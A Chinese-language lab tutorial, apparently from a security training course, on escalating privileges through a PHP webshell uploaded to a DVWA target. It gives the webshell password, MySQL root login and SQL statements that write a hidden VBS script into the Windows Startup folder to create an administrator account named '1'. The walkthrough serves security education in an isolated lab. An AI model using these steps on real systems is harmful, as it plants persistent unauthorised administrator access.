基于Mysql的webshell提權
【實驗目的】
通過本實驗了解webshell的使用方法,掌握如何通過webshell執行sql指令進行提權,熟悉基本的webshell提權思路。
【實驗環境】
攻擊機:Win2008-att
使用者名college,密碼360College
使用的webshell檔案:dama.php
目标靶機:Win2003-DVWA
使用者名college,密碼360College
【實驗步驟】
1.在靶機Win2003-DVWA上,啟動phpstudy,開啟漏洞環境。
2.在攻擊機上,啟動Firefox浏覽器,登入靶機上的DVWA網站。
網站的URL為:http://【靶機IP位址】/dvwa
登入使用者名為admin,密碼為password
3.成功登入DVWA網站後,選擇網站左側菜單“DVWA Security”,将DVWA網站安全等級設定為“Low”。
4.選擇網站左側菜單“File Upload”,将攻擊機Win2008-att桌面檔案夾Tools中的dama.php(實驗中所用的webshell)上傳至靶機。
5.dama.php上傳成功後,在攻擊機浏覽的位址欄中輸入如下URL連接配接dama.php:
http://【靶機IP位址】/dvwa/hackable/uploads/dama.php
出現登入提示框時,輸入密碼hucyuansheng登入。
6.成功登入dama.php後,選擇左側菜單“提權工具”->“MySQL操作”,輸入MySQL資料庫的登入密碼root,以root使用者權限登入。
7.選擇資料庫test,并執行如下操作:
(1)利用如下指令在test下建立一個新的表a:
create table a(cmd text);
該資料表表名為a,表中隻存放一個字段,字段名為cmd,為text文本。
(2)利用如下指令在表a中插入内容:
insert into a values("set wshshell=createobject (""wscript.shell"")");
insert into a values("a=wshshell.run(""cmd.exe /c net user 1 1 /add"",0)");
insert into a values("b=wshshell.run(""cmd.exe /c net localgroup administrators 1 /add"",0)");
注意雙引号和括号以及後面的"0"一定要輸入!将用這三條指令來建立一個vbs腳本程式!後面的"0"表示不彈出CMD視窗,安靜地運作。
上述三條指令執行成功後,可以看到如下圖所示的結果,表a中已儲存了相應的内容。也可以通過執行如下指令檢視表a中的内容:
select * from a;
(3)利用如下指令建立一個vbs腳本程式,并将其輸出至靶機作業系統的開始啟動項中:
select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」菜單\\程式\\啟動\\a.vbs";
8.在靶機上驗證攻擊效果。
(1)點選“開始”菜單->“啟動”,會發現啟動項中有一個a.vbs的腳本程式;
(2)重新開機靶機後,在cmd下輸入net user指令,會看到靶機作業系統中被添加了一個使用者“1”。
實驗至此結束。
思考與總結
通過本次實驗成功實作了基于webshell執行mysql指令來寫入一個自啟動功能的vbs腳本,掌握了基于webshell進行提權的方法,能夠結合作業系統安全政策,配置資料庫和作業系統的各項通路權限。
标簽:webshell,php,DVWA,提權,Mysql,靶機,dama
來源: https://www.cnblogs.com/miansj/p/13996089.html